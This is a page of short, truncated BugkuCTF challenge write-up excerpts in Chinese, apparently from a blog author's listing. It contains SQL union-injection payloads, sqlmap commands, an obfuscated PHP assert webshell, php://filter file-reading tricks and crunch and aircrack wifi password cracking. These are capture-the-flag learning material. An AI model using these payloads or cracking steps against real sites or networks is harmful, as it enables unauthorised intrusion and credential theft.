![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
BugkuCTF
3tu6b0rn
这个作者很懒,什么都没留下…
展开
-
BugkuCTF 成绩单
可以看出应该为sql联合注入 SQL注入之联合查询注入 要求查询列数相同,其中有Name、Math、 English、Chinese 一共四个数据,因此需要select 1,2,3,4 构造语句 id=0' union select 1,2,3,4# 查询数据库 id=0' union select 1,2,3,database()#找到数据库 skctf_flag 查询数据表id=0...原创 2019-04-02 00:27:46 · 1097 阅读 · 2 评论 -
BugkuCTF 这是一个神奇的登陆框
post注入 直接跑sqlmap吧 抓包到本地 sqlmap.py -r "C:\Users\联想\Desktop\1.txt" admin_name存在注入点 查数据库 sqlmap.py -r "C:\Users\联想\Desktop\1.txt" --dbs sqlmap.py -r "C:\Users\联想\Desktop\1.txt" -D bugkusql1 --tabl...原创 2019-05-15 23:54:52 · 342 阅读 · 0 评论 -
BugkuCTF web8
代码审计 <?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "<p>sorry!</p>"; } } ...原创 2019-05-15 23:11:52 · 453 阅读 · 0 评论 -
BugkuCTF 你从哪里来
提示的很明显 要从google访问 我们来看看访问一个页面我们的来源在哪看 百度搜索淘宝网 抓包 Referer中即可看到来源 现在来抓包添加Referer 得到flag flag:flag{bug-ku_ai_admin} ...原创 2019-05-14 22:12:29 · 565 阅读 · 0 评论 -
BugkuCTF 前女友(SKCTF)
打开看源代码发现有一个链接 点击进去 得到php源码 <?php if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1...原创 2019-05-14 21:39:20 · 206 阅读 · 0 评论 -
BugkuCTF cookies欺骗
页面中乱码 源代码也没有 只有url中有一串类似于base64 说明本网页可能访问的是keys.txt,将filename换为index.phh base64加密aW5kZXgucGhw 改变line即可得到代码 要么写脚本 那么就只能自己一行一行的试了 import requests a=30 for i in range(a): url="http://120.24.86....原创 2019-05-14 21:13:23 · 614 阅读 · 0 评论 -
BugkuCTF 字符?正则?
正则的题 <?php highlight_file('2.php'); $key='KEY{********************************}'; $IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match); if( $IM ){ d...原创 2019-05-14 20:38:58 · 455 阅读 · 0 评论 -
BugkuCTF 过狗一句话
点开链接没有任何内容,源代码也是 后台扫描也无果 回到提示 <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?> explode() ...原创 2019-05-14 18:31:11 · 529 阅读 · 0 评论 -
BugkuCTF welcome to bugkuctf
查看源代码 $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")) // $user必须存在 $user为文件且读出来...原创 2019-04-22 00:36:23 · 359 阅读 · 0 评论 -
BugkuCTF flag在index里
查看源代码 没有任何提示 点击click me跳转到show.php php://filter 大佬解释 php://filter是PHP语言中特有的协议流,作用是作为一个“中间流”来处理其他流。比如,我们可以用如下一行代码将POST内容转换成base64编码并输出:readfile("php://filter/read=convert.base64-encode/resource=php:/...原创 2019-04-01 15:42:20 · 217 阅读 · 0 评论 -
BugkuCTF 想蹭网先解开密码
破解wifi密码 通过hint告诉了密码应该是电话号码 用 linux 的 crunch crunch 11 11 -t 1391040%%%% >>wifi.txt 最小11 最大11 -t 指定模式 @ 插入小写字母 , 插入大写字母 % 插入数字 ^ 插入特殊符号 aircrac...原创 2019-05-29 16:39:54 · 1098 阅读 · 0 评论